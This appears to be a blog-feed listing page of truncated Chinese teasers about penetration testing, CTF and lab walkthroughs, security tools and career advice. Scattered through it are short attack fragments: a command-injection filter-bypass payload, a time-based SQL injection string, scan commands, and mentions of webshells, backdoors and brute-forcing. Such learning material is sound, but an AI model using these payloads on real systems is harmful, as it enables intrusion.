前言做渗透测试的时候偶然发现，phpmyadmin少见的打法，以下就用靶场进行演示了。 0x01漏洞发现环境搭建使用metasploitable2,可在网上搜索下载，搭建很简单这里不多说了。发现phpmyadmin，如果这个时候无法登陆，且也…

零基础如何入门渗透测试2024年最新版，保姆级教程，小白必看！

转眼间，从大三开始学安全，到现在也有五年了，也算是对渗透测试有一定理解，今天也是出一篇入门教程，以实操为主，希望可以帮助到想入门渗透测试的小白。如果觉得有用，可以给我点个赞和收藏&#xf…

ctfshow-命令执行(web118-web122)

web118 是一个窗口查看源码发现是system($code) 命令执行经过测试禁用了很多东西很多很多 $IFS可以思路就是使用系统变量构造我需要的poc 这些都是系统的环境变量这是答案${PATH:~A}${PWD:~A}$IFS????.??? 解释一下 PATH变量输出结尾一般都是n 因为网站默认根目…

渗透测试-服务器信息收集

提示：提示：注意：网络安全环境需要大家共同维护，请大家共同遵守网络安全规章制度，仅供大家参考，造成的法律后果，不由本人承担文章目录一、服务器二、服务器信息收集1. 端口信息收集2. 服务版本信…

Legba：一款功能强大的多协议凭证爆破与密码喷射枚举工具

关于Legba Legba是一款功能强大的多协议凭证爆破与密码喷射枚举工具。该工具的目的就是在消耗更少资源的同时实现更好的性能和稳定性，可以帮助广大研究人员执行多种协议场景下的凭证爆破，以及密码喷射和枚举任务。支持的协议和功能 AMQP（…

自学网络安全的三个必经阶段（含路线图）

一、为什么选择网络安全？ 这几年随着我国《国家网络空间安全战略》《网络安全法》《网络安全等级保护2.0》等一系列政策/法规/标准的持续落地，网络安全行业地位、薪资随之水涨船高。未来3-5年，是安全行业的黄金发展期，提前踏入…

【Hack The Box】windows练习-- devel

HTB 学习笔记【Hack The Box】windows练习-- devel 🔥系列专栏：Hack The Box 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间：🌴2022年10月28日🌴 &#x1f…

蓝队应急响应工具箱v2024.1

1 蓝队工具箱 v2024.1 2 简介蓝队工具箱是为打造一款专业级应急响应的集成多种工具的工具集，由真实应急响应环境所用到的工具进行总结打包而来，由 ChinaRan404,W 啥都学,清辉等开发者编写.把项目现场中所用到的工具连同环境一同打包，并实…

一次平平无奇的 Oracle 注入

在某次项目中，首先是发现注入点，数据库是Oracle，利用方式是时间盲注： 因为需要具体数据，所以要深入利用，手工肯定不方便，所以直接上 Sqlmap: Sqlmap也可以扫出该注入点，但想要进一步…

[VulnHub靶机渗透] 常用的linux提权方法——脏牛提权 dirty.c

🍬 博主介绍👨‍🎓 博主介绍：大家好，我是 hacker-routing ，很高兴认识大家~ ✨主攻领域：【渗透领域】【应急响应】【Java】【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 …

渗透测试CTF-图片隐写的详细教程（干货）

大家可以关注一下我的公众号-小白渗透测试 Binwalk Binwalk是一款快速、易用，用于分析，逆向工程和提取固件映像的工具。最直接的我们可以用来检测图片中是否有隐藏的文件。如图，拿到图片，使用binwalk工具检查发现存在文件包含…

SQL-Labs46关order by注入姿势

君衍. 四十六关 ORDER BY数字型注入1、源码分析2、rand()盲注3、if语句盲注4、时间盲注5、报错注入6、Limit注入7、盲注脚本四十六关 ORDER BY数字型注入请求方式注入类型拼接方式GET报错、布尔盲注、延时盲注ORDER BY $id 我们直接可以从界面中得知传参的参数为SORT&#x…

【Vue渗透】Vue站点渗透思路

原文地址极核GetShell 前言本文经验适用于前端用Webpack打包的Vue站点，阅读完本文，可以识别出Webpack打包的Vue站点，同时可以发现该Vue站点的路由。成果而言：可能可以发现未授权访问。识别Vue 识别出Webpack打包的Vue站…

WEB漏洞逻辑越权之支付数据篡改安全

水平越权概述：攻击者尝试访问与他拥有相同权限的用户的资源测试方法：能否通过A用户操作影响到B用户案例：pikachu-本地水平垂直越权演示-漏洞成因 1）可以看到kobe很多的敏感信息 2）burp抓包，更改user…

OSCP靶场--Shenzi

OSCP靶场–Shenzi 考点(1.目录扫描：可以尝试使用多个工具(扫描不出来任何东西，可以结合机器名拼接url 2.WP 目标插入webshell getshell 3.windows环境AlwaysInstallElevated提权) 1.nmap扫描 ┌──(root㉿kali)-[~/Desktop] └─# nmap -sV -sC -p- …

SQL-Labs靶场“26-28”关通关教程

君衍. 一、二十六关基于GET过滤空格以及注释报错注入1、源码分析2、绕过思路3、updatexml报错注入二、二十六a关基于GET过滤空格注释字符型注入1、源码分析2、绕过思路3、时间盲注三、二十七关基于union及select的过滤单引号注入1、源码分析2、绕过思路3、联合查询注入4、…

WEB漏洞 SSRF简单入门实践

一、漏洞原理 SSRF 服务端请求伪造原理：在某些网站中提供了从其他服务器获取数据的功能，攻击者能通过构造恶意的URL参数，恶意利用后可作为代理攻击远程或本地的服务器。二、SSRF的利用 1.对目标外网、内网进行端口扫描。 2.攻击内网或本地的…

PoC免写攻略

在网络安全领域，PoC（Proof of Concept）起着重要的作用，并且在安全研究、漏洞发现和漏洞利用等方面具有重要的地位。攻击方视角下，常常需要围绕 PoC 做的大量的工作。常常需要从手动测试开始编写 PoC，再到实…

网络安全攻防演练：提升应急响应能力的关键步骤

01、全力以赴，一切为了客户更好的安全 （1）满足合规要求网络安全法、地方性法规、等保2.0相关标准等均对此有明确的要求。 （2）了解安全“真实”现状 “真实”是我们认识事务的终极目标，如果我们能更真实地…

网络安全实战：记一次比较完整的靶机渗透

0x01信息搜集 nmap -sC -sV -p- -A 10.10.10.123 -T4 -oA nmap_friendzone访问80端口的http服务只发现了一个域名。 0x02 DNS区域传输因为我们前面扫描的时候发现了53端口是开着一个dns服务的，所以尝试使用friendzoneportal.red进行axfr，它的具体含…

【隧道应用-1】netsh端口映射内网

1、端口映射是指将一台主机的内网（LAN）IP 地址映射成一个公网（WAN）IP 地址，当用户访问提供映射端口主机的某个端口时，服务器将请求转移到本地局域内部提供这种特定服务的主机；利用端口映射功能…

Bypass WAF常规绕过思路

BYPASS WAFBYPASS WAF概念WAF的分类BYPASS WAF的各种绕过姿势Web架构层bypassWEB Server层bypassApache1.畸形method2.phpapache畸形的boundaryIIS1.%特性2.%u特性3.另类%u特性Web应用层bypass1.双重url编码2.变更请求方式3.HPP数据库层bypassMysql数据库1.参数和union之间的WA…

零基础入门网络安全，收藏这篇不迷茫【2022最新】

前言最近收到不少关注朋友的私信和留言，大多数都是零基础小友入门网络安全。其实看过的铁粉都知道，之前的文里是有过推荐过的。新来的小友可能不太清楚，这里就系统地叙述一遍。 01.简单了解一下网络安全说白了，网络安全就是指…

web安全渗透之钓鱼网站提权

本实验实现1：要生成一个钓鱼网址链接，诱导用户点击，实验过程是让win7去点击这个钓鱼网站链接，则会自动打开一个文件共享服务器的文件夹，在这个文件夹里面会有两个文件，当用户分别点击执行后，则会…

记一次攻防演练之vcenter后渗透利用

1. 说明很早之前的一次攻防演练，主要是从web漏洞入手，逐渐学习vcenter后利用技术。过程由于太长，很多细节都省略了，中间踩坑、磕磕绊绊的地方太多了。。。由于敏感性，很多地方都是打码或者是没有图，按照…

渗透测试CTF-图片隐写的详细教程2(干货)

上篇文章我们介绍了这7个工具，这里简单的介绍一下。 Binwalk 用来检测图片中是否有隐藏的文件。 Foremost 将图片中的隐藏文件拆分出来。 010Editor ①修改图片的参数来查看隐藏信息。 ②查看压缩包是否是伪加密。 Stegsolve.jar 图片隐写查看神器。 OurSecret 1个图…

PHPInfo()信息泄漏原理以及修复方法

漏洞名称：PHPInfo信息泄漏、phpinfo()函数信息泄漏漏洞描述： phpinfo()函数返回的信息中包含了服务器的配置信息，包括： 1）PHP编译选项以及文件扩展名的相关信息； 2）php的版本信息 3&#…

[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)（二）XSS注入相关面试题

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成…

网络安全之反序列化漏洞复现

0x01 Apereo cas简介 Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。 CAS 全程Central Authentication Service（中心认证服务），是一个单点登录协议，Apereo CAS是实现该协议的软件包。单点登录定义 …

网络安全实战之植入后门程序

在VMware上建立两个虚拟机：win7和kali。 Kali：它是Linux发行版的操作系统，它拥有超过300个渗透测试工具，就不用自己再去找安装包，去安装到我们自己的电脑上了，毕竟自己从网上找到，也不安全。它…

2024护网面试题精选(一)

0x00.基础漏洞篇 00-TOP10漏洞 1.SQL注入 2.失效的身份认证和会话管理 3.跨站脚本攻击XSS 4.直接引用不安全的对象 5.安全配置错误 6.敏感信息泄露 7.缺少功能级的访问控制 8.跨站请求伪造CSRF 9.实验含有已知漏洞的组件 10.未验证的重定向和转发 01-SQL注入漏洞 …

自学黑客，一般人我还是劝你算了吧

当我们谈论网络安全时，我们正在讨论的是保护我们的在线空间，这是我们所有人的共享责任。网络安全涉及保护我们的信息，防止被未经授权的人访问、披露、破坏或修改。一、网络安全的基本概念网络安全是一种保护：它涉及保护我们的设…

萌新小白对于ctf学习的笔记--CTF中的RCE

概念 RCE(Remote code execution）远程代码执行漏洞，RCE又分命令执行和代码执行。 RCE-远程代码执行：远程执行PHP代码RCE-远程命令执行：远程执行Linux或者Windows等系统命令。常见函数有： PHP：eval(),a…

ctfshow(WEB AK赛)

目录 web-观己 web1-观字 web2-观星 web3-观图 web4-观心过程and分析 web-观己没啥难的有include 想着伪协议但是过滤了php 那就是用file为协议读取本地文件全靠猜 <?php if(isset($_GET[file])){$file $_GET[file];if(preg_match(/php/i, $file)){die(error);}…

内网 IP 地址泄漏原理以及修复方法

漏洞名称：内网IP地址泄漏漏洞描述： 网站的内部IP地址，常常被攻击者通过信息收集，得到其内网的IP地址，对于渗透攻击，打下良好基础，如内网Ip地址段，IP路由等等。IIS为常见的泄露内网…

【网络安全渗透】常见文件上传漏洞处理与防范

✨✨ 欢迎大家来到景天科技苑✨✨ 🎈🎈 养成好习惯，先赞后看哦~🎈🎈 所属的专栏：网络安全渗透景天的主页：景天科技苑文章目录 1.文件上传漏洞1.1. 描述1.2. 危害1.3. 有关文件上传的知识1.4…

应急响应靶机训练-Web3题解

前言接上文，应急响应靶机训练-Web3。前来挑战！应急响应靶机训练-Web3 题解首先登录用户administrator 寻找隐藏用户找到隐藏用户hack6618$ 然后去找apache的日志文件分析得出两个IP地址 192.168.75.129 192.168.75.130 然后更换hack6618$的…

2024全国护网行动HW行动招聘/收人！！！

2024全国护网行动HW行动招聘溯蓉信创开始收人啦！！！现在开始收录2024HW简历，感兴趣的小伙伴扫码二维码添加微信我们签约后，入场即预付款3k，签约后我们会在HW之前对我们的人员进行HW培训，保证上…

内网渗透神器CobaltStrike之会话管理(五)

CS之间派生会话将CS1管理的会话派生至CS2中, 简单来说就是将CS1服务器的肉鸡送给CS2服务器准备环境主机描述Kali(192.168.47.134)CS TeamServer1Kali2(192.168.47.144)CS TeamServer2Windows7(192.168.47.133)CS客户端,攻击机Windows7(192.168.47.141)受害机操作步骤首先…

全国职业院校技能大赛中职组网络安全竞赛试题 —命令注入（笔记文档）

全国职业院校技能大赛中职组网络安全竞赛试题 —命令注入（笔记文档） 中职网安命令注入笔记命令注入 1.命令注入攻击的常见模式为：仅仅需要输入数据的场合，却伴随着数据同时输入了恶意代码，而装载数据的系统对此并未…

Nmap系统扫描实战

今天继续给大家介绍渗透测试相关知识，本文主要内容是Nmap系统扫描实战。免责声明： 本文所介绍的内容仅做学习交流使用，严禁利用文中技术进行非法行为，否则造成一切严重后果自负！ 再次强调：严禁对未授权设备…

常见服务及其安全漏洞浅析（一）

今天继续给大家介绍渗透测试相关知识，本文主要内容是常见服务及其安全漏洞浅析。免责声明： 本文所介绍的内容仅做学习交流使用，严禁利用文中技术进行非法行为，否则造成一切严重后果自负！ 再次强调：严禁对未…

Webug4.0靶场通关

14.Webug4.0靶场通关显错注入首先整体浏览网站注入点： control/sqlinject/manifest_error.php?id1 判断注入类型输入: and 11 正常, 再输入: and 12 还正常, 排除数字型输入单引号: ’ 网页发生变化输入’ – q注释掉单引号,页面回显正常则为字符型判…

Android终端搭建kali渗透测试环境

推荐阅读商务合作安全产品安全服务

sqlmap常用tamper汇总及使用指导

遍历tamper脚本GitHub - m4ll0k/Atlas: Quick SQLMap Tamper Suggester一、编码： 1.1 base64encode.pybase64编码所有字符("1 AND SLEEP(5)#")替换后MScgQU5EIFNMRUVQKDUpIw1.2 charencode.pyURL编码SELECT FIELD FROM%20TABLE替换后%53%45%4c%45%43%54%2…

渗透测试实战 - 外网渗透内网穿透（超详细）

文章目录实验环境Target1 - Centos7 （web服务）Target2 - Ubuntu （内网web服务）Target3 - Windows7 (客户端)实验目的实验步骤测试Target1信息收集22/21端口弱口令爆破(MSF，hydra)3306端口8888端口80端口主机信息收集反…

新手如何学习挖SRC漏洞？【网络安全】

前言有不少阅读过我文章的伙伴都知道，我从事网络安全行业已经好几年，积累了丰富的经验和技能。在这段时间里，我参与了多个实际项目的规划和实施，成功防范了各种网络攻击和漏洞利用，提高了安全防护水平。也有很多小…

CTFer成长之路之CTF中的SQL注入

CTF中的SQL注入CTF SQL注入 SQL注入-1 题目描述: 暂无 docker-compose.yml version: 3.2services:web:image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latestports:- 80:80启动方式 docker-compose up -d 题目Flag n1book{union_select_is_so_cool} Wri…

[ vulhub漏洞复现篇 ] Drupal 远程代码执行漏洞（CVE-2019-6339）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

黑客入门教程【非常详细】从零基础入门到精通，看这一篇就够了！

首先要明白啊，我们现在说的黑客不是那种窃取别人信息、攻击别人系统的黑客，说的是调试和分析计算机安全系统的网络安全工程师。黑客技术的核心就是渗透攻防技术，是为了证明网络防御按照预期计划正常运行而提供的一种机制。就是通过模拟恶意…

零基础小白看什么书或是掌握什么技能才可以踏进网络安全的大门？

大家好，经常会遇到有人会去问这个问题，而对于刚入门安全的同学来说也确实是一个避不开的话题。这说这个话题之前，我们尝试来解析这个问题的目的： 1、知识面扩展：获取最新的安全资讯，了解圈内、行业内的动…

超详细攻略 | CISSPCCSP背书以及维持流程

(ISC)国际信息系统安全认证联盟成立于1989年，是全球最大的网络、信息、软件与基础设施安全认证会员制非营利组织，是为信息安全专业人士职业生涯提供教育及认证服务的全球领导者。(ISC) 以其一流的信息安全人才教育与培养计划，以及 “金牌标准…

网络安全里主要的岗位有哪些？小白如何快速入门学习黑客？

入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等，每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低，也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程👇 网…

[ 渗透工具篇 ] EHole(棱洞)3.0安装部署及详解（linux win）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

ToBeWritten之嵌入式操作系统

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

ToBeWritten之物联网 BlueTooth/BLE 协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

26岁转行网络安全，成功上岸安全开发！

前言我是去年 9 月 22 日才正式学习网络安全的，之前在国营单位工作了 4 年，在长沙一个月工资只有 5000 块，而且看不到任何晋升的希望，如果想要往上走，那背后就一定要有关系才行。而且国营单位的气氛是你干的多了&a…

2023年最新网络安全渗透工程师面试题汇总！不看亏大了！

技术面试问题 CTF 说一个印象深刻的CTF的题目 Padding Oracle->CBC->密码学(RSA/AES/DSA/SM) CRC32 反序列化漏洞 sql二次注入第一次进行数据库插入数据的时候，仅仅只是使用了 addslashes 或者是借助get_magic_quotes_gpc 对其中的特殊字符进行了转义&…

网络安全有什么学习误区？

一、网络安全学习的误区 1.不要试图以编程为基础去学习网络安全不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，且过渡到网络安全用到编程的用到的编程的关键点不多。一般人如果想要把编程学好再开始学习网络安全往…

Apache Solr Velocity模板注入RCE

Apache Solr Velocity模板注入RCE 一、Apache Solr介绍 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于web-service的API接口,用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引,也可以通过http get操作提出查找请求,并得到XML格式的返回结果。…

【网络安全】记一次杀猪盘渗透实战

看起来非常假的网站，这个网站是没有 cdn 的用的是 thinkphpk 框架搭建的。先打一波 poc 没有效果访问一下后台直接在 url 后面加/admin。一个开源的 cms 还没有验证码尝试用 burp 进行爆破，首先在火狐上设置代理 ip 为 127.0.0.1 代理端口为 8081。 B…

webshell及工具

目录一，Webshell的概念二，eval函数的定义和用法三，连接工具菜刀 3.1文件管理 3.2 虚拟终端 3.3 菜刀与burpsuite联动四，哥斯拉的使用五，冰蝎六，webshell分类七，webshell如何连接 …

网络安全工程师必须面对的三个坎必备十大基础知识！

前言我一个朋友老赵，老赵在一家大型互联网公司做高级网络安全工程师，从实习生到工程师整整待了六年。去年他们公司为了缩减成本，做了裁员，他也在其中，取而代之的是一个只有三年工作经验的 “新人” … 老赵想着&…

第二届全国技能大赛（世赛项目）云南省选拔赛 “网络安全项目”任务书

第二届全国技能大赛（世赛项目） 云南省选拔赛 “网络安全项目”任务书 A模块基础设施设置/安全加固（350分）A-1：登录安全加固（windows、linux）A-2：本地安全策略设置（Window…

黑客入门指南，学习黑客必须掌握的技术

黑客一词，原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。是一个喜欢用智力通过创造性方法来挑战脑力极限的人，特别是他们所感兴趣的领域，例如电脑编程等等。提起黑客，总是那么神秘莫测。…

暗月内网靶场渗透笔记

简介靶场下载地址： 靶场地址： https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ 提取码: 3p47虚拟机网络设置： 靶场拓扑图： 靶机账号密码： 信息收集内网扫描靶机就在本地，直接进行本地内网扫描即可…

网络安全35岁是新时代挑战？

前言对于一个工作不下于4年的人来说，我觉得我有一定的思考沉淀来回答这个问题。说说我的一些经历吧。普通一本毕业，专业是自动化，大学由于挂科太多没拿到学位证到上海找实习，一开始做的是开发，从16年到19年都是做…

2023年安全岗秋招经验分享，纯干货，建议收藏！

需要准备的几个方向简历自我介绍计算机网络操作系统（操作系统原理，Linux，Windows）数据库算法（Leetcode）编程语言（Python,C,go等）安全知识（很多很杂，建议根据…

渗透测试信息收集——nmap等工具搭配使用

文章目录工具的搭配使用1、Nmap典型用途2、Nmap常用扫描参数说明3、Nmap脚本分类4、实例常用扫描脚本使用工具的搭配使用所有的渗透都是建立在端口上面常见的端口信息及渗透方法端口号端口服务/协议简要说明关于端口可能的一些渗透用途 tcp 21 ftp 默认…

sqlmap命令大全（附详细扫描流程）

一、sqlmap命令大全。 -u 指定目标URL (可以是http协议也可以是https协议)-d 连接数据库--dbs 列出所有的数据库--current-db 列出当前数据库--tables 列出当前的表--columns 列出当前的列-D 选择使用哪个数据库-T 选择使用哪个表-C 选择使用哪个列--dump 获取字段中的数据--…

无状态子域名爆破工具（附下载）

ksubdomain是一款基于无状态子域名爆破工具，支持在Windows/Linux/Mac上使用，它会很快的进行DNS爆破，在Mac和Windows上理论最大发包速度在30w/s,linux上为160w/s的速度。总的来说，ksubdomain能爆破/验证域名，并且快和…

Apache Tomcat AJP协议文件读取与包含

永远也不要忘记能够笑的坚强，就算受伤，我也从不彷徨。 0x01.漏洞情况分析 Tomcat是Apache软件基金会Jakarta 项目中的一个核心项目，作为目前比较流行的Web应用服务器，深受Java爱好者的喜爱，并得到了部分软件开发商的…

2023年最新整理渗透测试面试题

1、include、include_once、require、 require_once区别参考答案： 1、require()和require_once()函数： （1）require()函数引入文件不存在时，将立即退出程序，不再向下执行。 （2）…

网络安全工程师考证指南

已经到2023年了，那么信息安全类证书最有前途的有哪些呢？今天和大家一起聊聊这个话题！ 1.CISP(国家登记的信息安全专业人员) 就CISP而言，安全实践者基本耳闻，算是国内权威认证，毕竟有政府背景为认证做背书&…

HW之轻量级内网资产探测漏洞扫描工具

简介 RGPScan是一款支持弱口令爆破的内网资产探测漏洞扫描工具，集成了Xray与Nuclei的Poc 工具定位内网资产探测、通用漏洞扫描、弱口令爆破、端口转发、内网穿透、SOCK5 主机[IP&域名]存活检测，支持PING/ICMP模式端口[IP&域名]服务扫描网…

网络安全-XSS的原理、攻击及防御

简介跨站脚本攻击(全称Cross Site Scripting,为和CSS（层叠样式表）区分，简称为XSS)是指恶意攻击者在Web页面中插入恶意javascript代码（也可能包含html代码），当用户浏览网页之时，嵌入其中Web里面…

一个比StegSolve更方便的工具—zsteg

前言 CTF的图片隐写题中有一种常见的题型——基于LSB原理的图片隐写，而最常用工具就是Stegsolve，但是过程还是有些缓慢和复杂，终于在一次比赛中发现了一个强大的工具——zsteg，这是一个用于检测PNG和BMP中的隐藏数据隐藏数据的工…

一个拦截XSSI 识别Web蜜罐的插件

说明这是一个带有学习和研究性质的Chrome扩展程序。功能截获页面中发起的XSSI请求，通过域名、URI、Query黑名单特征识别阻断可疑的XSSI（Jsonp Callback、XSS等） 对可疑URL进行深度检测，通过发送请求获取body内容&#xff0c…

一款红队批量脆弱点搜集工具

功能指纹识别:调用“三米前有香蕉皮“前辈工具，他的工具比finger好用寻找资产中404，403，以及网页中存在的其他薄弱点，以及需要特定路径访问的资产后续会把nuclei加进来目前只有windows可以用使用第一次使用脚本请运行p…

500道网络安全/WEB安全面试题合集！附答案解析

前言随着国家政策的扶持，网络安全行业也越来越为大众所熟知，想要进入到网络安全行业的人也越来越多。为了拿到心仪的 Offer 之外，除了学好网络安全知识以外，还要应对好企业的面试。作为一个安全老鸟，工作这么多年…

零基础想学黑客？推荐你了解一下Kali Linux！（建议收藏）

最近好多朋友问我：不会编程，英语也不好，dos命令也记不住，能学习黑客技术么？ 我可以明确告诉大家，可以的！ 相信每一个少年心中，曾经都有过一个黑客梦！ 有人觉得黑客霸气…

内网渗透—红日靶场三

文章目录0x01、环境配置0x02、Centos getshell0x03、Centos提权0x04、内网穿透—设置路由0x05、内网穿透—设置代理0x06、获取内网目标shell通过smb拿shell或者本地挂代理使用k8tools拿shell0x01、环境配置打开虚拟机镜像为挂起状态，第一时间进行快照，…

内网域渗透—红日靶场1

文章目录0x01、实验环境0x02、web服务器getshell0x03、提权上线0x04、内网渗透0x01、实验环境红日一靶场网络拓扑图实验环境 win7:web服务器公网IP：192.168.1.139内网IP：192.168.52.143 Win2008:域控内网IP：192.168.52. Win2003:域成员…

Windows应急响应简述

Windows应急响应 0x01、什么是应急响应应急响应概述首先我们来了解一下两个概念：应急响应和安全建设，这两者的区别就是应急响应是被动响应、安全建设是主动防御。常见的有： 安全设备告警、数据被勒索加密、数据泄露在网上贩卖、网页被…

任意文件下载

任意文件下载文章目录任意文件下载常规思路Linux常见的可以利用的文件pikachu文件下载真实环境——文件下载漏洞修复一些网站由于业务需求，往往需要提供文件查看或文件下载功能，但若对用户查看或下载的文件不做限制，则恶意用户就能够查看或下…

逻辑越权简述

逻辑越权挖洞分较高，挖洞较为主流，渗透项目很少遇到从安全角度来看，影响不大，无法getshell，对于隐私来说会造成信息泄露越权利用：参数可控越权一般出现在超大型网站：旅游、证券、航空、…

XXE—XML外部实体注入

XXE 0x01、XML 什么是XML？ XML 是可扩展标记语言（EXtensible Markup Language） XML的特点是一种标记语言被设计来进行数据传输可以自定义标签具有层级结构具有自我描述性 XML数据格式组成声明 <?xml version"1.0" enco…

XSS学习

XSS 文章目录XSS一、简介二、xss攻击危害三、分类：四、攻击流程五、xss产生原因六、构造xss攻击脚本七、自动XSS攻击八、利用1、判断是否存在xss2、利用存储型xss一、简介曾经很有用的洞，目前很少有用武之地，首先在真实目标中，x…

phpstudy后门

phpstudy后门一、漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包，通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer 多款软件一次性安装，无需配置即可直接安装使用，具有PHP环境调试和PHP开发功能，在…

木马后门简单分析

木马后门分析加密过的马一种是为了过waf，另一种就是隐藏有后门案例：记一次免杀木马后门分析略实操一： 马已加密 1、解密在变量前添加echo 进入马子的页面可以看到是base64的加密，复制从eval开始的加密代码&#xff0…

第三方提权

第三方提权可以进入注册表查看装了哪些软件搜狗输入法提权原理：通过搜狗输入法的权限不严格，在默认安装搜狗输入法时，权限赋予过大，everyone（所有）权限（绝对控制） 通过伪造exe文…

Mysql提权（UDF提权）

数据库提权较为实用，但只有在root权限才可以提权 mysql提权（udf提权） 借用于mysql func，对认证的用户，只要拥有INSERT和DELETE权限，就可以在任意数据库下l创建一个函数攻击数据库拿到webshell后先看数据…

文件上传之Nginx解析漏洞

文章目录Nginx解析漏洞漏洞描述漏洞复现1、搭建环境2、上传并抓包添加PHP脚本语言3、访问页面4、修复Nginx解析漏洞漏洞描述该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞。由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,对于任意…

SQL注入基础

[Access注入Access偏移注入] 文章目录SQL注入基础1、SQL注入产生原理详细分析2、各种数据库3、SQL注入原理4、SQL注入条件SQL注入基础 SQL 注入非常复杂，区分各种数据库类型，提交方法，数据类型等注入，学会相关 SQL 注入的核心。此…

网络安全是一个好的专业吗？高考之后怎么选择？

目录一.始于大学二.一路成长三. 如何学习网络安全学前感言零基础入门尾言本人信息安全专业毕业，在甲方互联网大厂安全部与安全乙方大厂都工作过，有一些经验可以供对安全行业感兴趣的人参考。或许是因为韩商言让更多人知道了CTF&#xff0…

某SRC的渗透测试实战

前言因为不甘心被称作会只点鼠标的猴子，所以开始了一次某SRC漏洞挖掘，为期一个多星期。文章有点长，但请耐心看完，记录了完整的SRC漏洞挖掘实战渗透过程因为选择的幸运儿没有对测试范围进行规划，所以此次范围就是…

网络安全工程师的入门学习路径，年薪30W不是梦！

最近看到网上有很多人在问诸如：“怎样成为网络信息安全工程师”等相关问题，这可能与近几年网络安全事件频发，国家对于互联网信息安全和互联网舆情的重视程度不断提升有关，网络信息安全工程师随之成为炙手可热的职业。首先&#…

从零开始学习CTF——CTF基本概念

这一系列把自己学习的CTF的过程详细写出来，方便大家学习时可以参考。一、CTF简介 01」简介中文一般译作夺旗赛（对大部分新手也可以叫签到赛），在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。 CTF…

网络安全怎么入行？有哪些误区需要避免？

目录一、学习网络安全容易造成的误区二、学习网络安全的基本准备与条件三、网络安全学习路线第一步：计算机基础第二步：编程能力第三步：安全初体验第四步：分方向怎么入门？ 四、明确目标，定…

Vulnhub靶机haclabs：deception1.1渗透

靶机介绍官方下载地址：https://www.vulnhub.com/entry/haclabs-deception11,440/ 靶机有三个flag，第一个flag是下载靶机镜像压缩包的密码，第二个flag在yash用户的家目录里面，第三个flag在root目录下运行环境靶机：网…

【网络安全】成功上岸深信服，这套面试题你肯定需要！！！

时间过得很快，回想起去年的这个时候，我也正在准备秋招，今天的我刚刚结束培训。我的个人情况就读于某双非大学，信息与计算科学（大数据方向，校企合作，一个介于数学与计算机之间的专业&#xff0…

网络安全-01-VMware安装Kali部署DVWA

网络安全-01-VMware安装Kali&部署DVWA 🔻一、Kali简介&下载📗 二、VMware安装Kali📰 2.1 新建虚拟机📰 2.2 开始安装Kali📰 2.3 更换apt源为国内源📰 2.4 启动mysql-这里使用自带的maridb&#x1f…

Kali渗透Windows服务器

这个实验主要让我们学习漏洞扫描技术基本原理，了解其在网络攻防中的作用，掌握使用Kali中的Metasploit对目标主机渗透，并根据报告做出相应的防护措施。本次实战环境：Kali渗透Windows服务器实战步骤一本实验通过利用kali进行漏…

零基础小白如何快速入门网络安全/Web安全？

前言网络安全现在是朝阳行业，缺口是很大。不过网络安全行业就是需要技术很多的人达不到企业要求才导致人才缺口大初级的现在有很多的运维人员转网络安全，初级也会慢慢的卷起来，但是岗位多不用怕，以后各大厂也都会要网络安全人…

Linux centos7下漏洞扫描工具 Nessus8.15.9的下载、安装

一、下载Nessus 传送带地址：Download Nessus | Tenable 因为Darren洋的Linux操作系统是Linux Centos7 64 位，大家可以根据自己的选择合适的系统版本，在linux系统中用以下命令即可完成查询系统版本。 cat /etc/redhat-release 二、安装Ness…

渗透测试实战-BurpSuite 使用入门

前言近期笔者在学习 web 渗透测试的相关内容，主要是为了公司之后的安全产品服务。渗透测试本身在学习过程中还是很有意思的，有一种学习到了之前想学但是没学的黑客技术的感觉，并且对笔者已掌握的许多知识做了有益的补充。要学习渗透测试&…

零基础自学：2023年的今天，请谨慎进入网络安全行业

前言 2023年的今天，慎重进入网安行业吧，目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多，还有很多高中被挖过来的大佬。理由很简单，目前来说，信息安全的圈子人少，985、211院校很多都才建…

渗透测试面试题汇总

2023年快过去一半了，不知道小伙伴们有没有找到自己心仪的工作呀【doge】，本文总结了常见的安全岗位面试题，方便各位复习。祝各位事业顺利，财运亨通。在网络安全的道路上越走越远！ 所有的资料都整理成了PDF&#xff0c…

vulnhub靶机bex渗透

运行环境靶机：网络设为桥接，IP地址为192.168.34.154 攻击机：同网段下的kali linux，IP地址为192.168.34.153 开始渗透： 将靶机运行起来获取靶机IP地址扫描端口访问80端口源码提示了一个php文件有文件包含访问…

